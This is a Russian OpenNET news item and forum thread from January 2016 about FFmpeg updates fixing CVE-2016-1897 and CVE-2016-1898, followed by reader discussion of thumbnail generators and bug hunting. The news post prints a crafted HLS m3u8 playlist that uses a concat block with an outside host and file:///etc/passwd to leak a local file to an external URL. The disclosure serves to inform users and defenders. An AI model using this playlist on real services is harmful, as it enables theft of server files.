The OpenNET Project / Index page

[ новости/++ | форум | wiki | теги ]

форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка  RSS
"Обновление FFmpeg с устранением опасных уязвимостей"
Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Изначальное сообщение [ Отслеживать ]

"Обновление FFmpeg с устранением опасных уязвимостей"  +/
Сообщение от opennews (ok) on 16-Янв-16, 19:17 
Доступны (http://ffmpeg.org/download.html) корректирующие обновления мультимедиа-пакета FFmpeg 2.8.5, 2.7.5, 2.6.7 и 2.5.10, в которых устранены (http://git.videolan.org/?p=ffmpeg.git;a=commit;h=e183075dc11...) опасные уязвимости (http://www.slideshare.net/MailRuGroup/security-meetup-22-mailru) (CVE-2016-1897, CVE-2016-1898), которые могут привести к выгрузке произвольных файлов в случае обработки специально оформленных файлов утилитами ffmpeg, ffprobe, avconv и avprobe. Например, уязвимость представляет угрозу сервисам, в которых осуществляется перекодирование или обработка поступающих от пользователей файлов при помощи ffmpeg/libav, и файловым менеджерам, использующим ffmpeg/libav для создания эскизов.


Уязвимость может использоваться для подстановки (https://github.com/ctfs/write-ups-2015/tree/master/9447-ctf-...) содержания произвольного локального файла в результат перекодирования или для отправки (http://habrahabr.ru/company/mailru/blog/274855) на произвольный внешний URL. Например, можно передать для обработки файл с произвольным расширением (avi, mov и т.п.), в котором добавить заголовок и данные плейлиста в формате HLS m3u8, указав в качестве одного из элементов блок "concat" с внешним URL и локальным файлом, например:


<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:10.0,
   concat:http://test.com/header.m3u8|file:///etc/passwd
   #EXT-X-ENDLIST

</font>


В результате обработки данного файла ffmpeg загрузит http://test.com/header.m3u8, который может содержать:


<font color="#461b7e">
   #EXTM3U
   #EXT-X-MEDIA-SEQUENCE:0
   #EXTINF:,
   http://example.org?
</font>

После обработки header.m3u8 ffmpeg передаст содержимое file:///etc/passwd в составе запроса на URL "http://example.org". Если вместо операции concat в переданном для обработки файле ограничиться указанием file:///etc/test.txt, то будет создан мультимедийный файл, включающий первую строку указанного локального файла.


<center><iframe src="//www.slideshare.net/slideshow/embed_code/key/E8vCNOzffF2gs0" width="595" height="485" frameborder="0" marginwidth="0" marginheight="0" scrolling="no" style="border:1px solid #CCC; border-width:1px; margin-bottom:5px; max-width: 100%;" allowfullscreen></iframe></center>
<center><iframe width="640" height="360" src="https://www.youtube.com/embed/HRNPnbxrSCo?rel=0" frameborder="0" allowfullscreen></iframe></center>

URL: https://twitter.com/FFmpeg/status/688187976132603904
Новость: http://www.opennet.ru/opennews/art.shtml?num=43685

Ответить | Правка | Cообщить модератору

Оглавление

Сообщения по теме [Сортировка по времени | RSS]


1. "Обновление FFmpeg с устранением опасных уязвимостей"  +/
Сообщение от soarin (ok) on 16-Янв-16, 19:17 
% brew info ffmpeg
ffmpeg: stable 2.8.4 (bottled), HEAD

Вот так посмотришь чего-то и похакают...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

28. "Обновление FFmpeg с устранением опасных уязвимостей"  +1 +/
Сообщение от й on 17-Янв-16, 16:55 
твои мак-серверы уже в безопасности, комрад:

> brew info ffmpeg

ffmpeg: stable 2.8.5 (bottled), HEAD

кстати, а какие практические применения мак-сервера кроме окружения для CI в яблочных проектах?

Ответить | Правка | ^ к родителю #1 | Наверх | Cообщить модератору

2. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +5 +/
Сообщение от Anonplus on 16-Янв-16, 19:43 
Самое крутое, что в той же убунте достаточно лишь скачать такой видеофайл и при создании эскиза в файловом менеджере сразу всё и произойдёт.

Вот более подробное описание непосредственно от человека, обнаружившего уязвимость и отправившего патч в FFmpeg: http://habrahabr.ru/company/mailru/blog/274855/

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

3. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  –2 +/
Сообщение от soarin (ok) on 16-Янв-16, 20:03 
Ну так в линуксах же всюду эскизы в файловых менеджерах делаются с помощью ffmpeg, а не только в той же ubuntu.
Ответить | Правка | ^ к родителю #2 | Наверх | Cообщить модератору

4. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от anon1984 on 16-Янв-16, 20:35 
нет
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

26. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от soarin (ok) on 17-Янв-16, 13:25 
Ну что нет? Поглядел на Dolphin - тоже самое...
Ответить | Правка | ^ к родителю #4 | Наверх | Cообщить модератору

22. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Аноним (??) on 17-Янв-16, 10:54 
Я у себя в KDE когда-то отключил из-за бага с disk i/o. Эти эскизы ещё попьют кровушки у народа.
Ответить | Правка | ^ к родителю #3 | Наверх | Cообщить модератору

5. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +2 +/
Сообщение от Аноним (??) on 16-Янв-16, 22:00 
Пустил Tor через VPN. Скачал файл. Файл напрямую обратился к IP honeypot при запуске проигрывателя. ip добавлен в базу пиратов. Обращаемся к провайдеру и сверяем время/размер пакетов. Высылаем штраф или повестку в суд.
Если автоматизировать операцию можно получить миллиарды долларовс Европы, Австралии, Японии или США.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

6. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Аноним (??) on 16-Янв-16, 22:01 
Не Tor, а торрент клиент через Tor или VPN. Или их комбинацию.
Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

7. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  –1 +/
Сообщение от Аноним (??) on 16-Янв-16, 22:32 
"Файл напрямую обратился к IP"

Чтобы специально подготовленный видеофайл отправил запрос, нужно 1). Чтобы он воспроизводился с помощью ffmpeg, а это только полутора процентов в мире 2). И вообще, это в плагине HTTP Live Streaming баг, а не в обычной воспроизводилке.

Ответить | Правка | ^ к родителю #5 | Наверх | Cообщить модератору

29. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от Аноно on 21-Янв-16, 11:26 
Нет, достаточно ПРОСТО ИМЕТЬ: файловый менеджер с эскизами (практически все дистрибутивы linux).

А вот запускать надо с: свободный плеер (VLC/MPlayer) или ещё что-то использующее ffmpeg (например программу для работы с видео).

Ответить | Правка | ^ к родителю #7 | Наверх | Cообщить модератору

8. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от Аноним (??) on 16-Янв-16, 22:45 
Как он додумался до такого ?
вообще всегда после сообщения о нахождении какой-то дыры  у меня возникает вопрос КАК  человек смог додуматься до такого ?
Ибо я тоже так хочу
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

11. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Аноним (??) on 17-Янв-16, 00:38 
человек либо копался в коде и сумел хорошо его понять, т.е. он или разраб, или зарабатывает на поиске багов именно в ffmpeg (это маловероятно); либо случайно напоролся, вероятность чего достаточно мала.
поэтому скорее всего разраб.
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

15. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +3 +/
Сообщение от Crazy Alex (ok) on 17-Янв-16, 04:22 
Вообще-то это скорее склад ума такой - понять, как нечто работает и оценить, что могло пойти не так. В сущности, для разработчика любых сложных систем это необходимый навык, только не у каждого он ещё дополняется достаточным интеллектуальным любопытством, чтобы после ментальных упражнений начинать ковыряться на практике и проверять свои предположения.
Ответить | Правка | ^ к родителю #11 | Наверх | Cообщить модератору

14. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Аноним (??) on 17-Янв-16, 01:13 
Расслабься, тут нужно мозгом думать - не всем дано
Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

16. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Crazy Alex (ok) on 17-Янв-16, 04:23 
Дано-то всем, но не всем нравится
Ответить | Правка | ^ к родителю #14 | Наверх | Cообщить модератору

23. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от Аноним (??) on 17-Янв-16, 11:17 
В данном случае довольно простая идея. Использовать плейлист вместо реальной дорожки. Остальное уже вокруг.

Чтобы так мочь, надо досконально знать вещи с уровня исходного кода реализации и выше. По времени примерно пять лет самообразования.

Ответить | Правка | ^ к родителю #8 | Наверх | Cообщить модератору

10. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  –1 +/
Сообщение от privation on 17-Янв-16, 00:36 
это только часть айсберга
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

13. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +1 +/
Сообщение от Аноним (??) on 17-Янв-16, 00:47 
его обычно с титаниками используют вроде blender, vlc, mpv, mplayer, chrome, etc.
Ответить | Правка | ^ к родителю #10 | Наверх | Cообщить модератору

24. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  –1 +/
Сообщение от Аноним (??) on 17-Янв-16, 11:19 
Ник cdump - что может значить буква си?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от iZEN (ok) on 17-Янв-16, 12:13 
% pkg info -r ffmpeg-2.8.4,1
ffmpeg-2.8.4,1:
    firefox-43.0.4_1,1
    gstreamer1-libav-1.6.2
    mpv-0.14.0,1
    youtube_dl-2016.01.14
    aqualung-1.0
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

27. "В FFmpeg устранена уязвимость, которая может привести к утеч..."  +/
Сообщение от Ыр2.0 on 17-Янв-16, 15:16 
Когда во ффмпеге будет многопоточность для флака?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

30. "В FFmpeg устранена уязвимость, которая может привести к..."  +/
Сообщение от arisu (ok) on 22-Янв-16, 07:05 
хоспаде, дался всем этот /etc/passwd… ну, на здоровье. помогло чем? http://dpaste.com/3BMFXPB
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема


  Закладки на сайте
  Проследить за страницей
Created 1996-2017 by Maxim Chirkov  
ДобавитьРекламаВебмастеруГИД  
Hosting by Ihor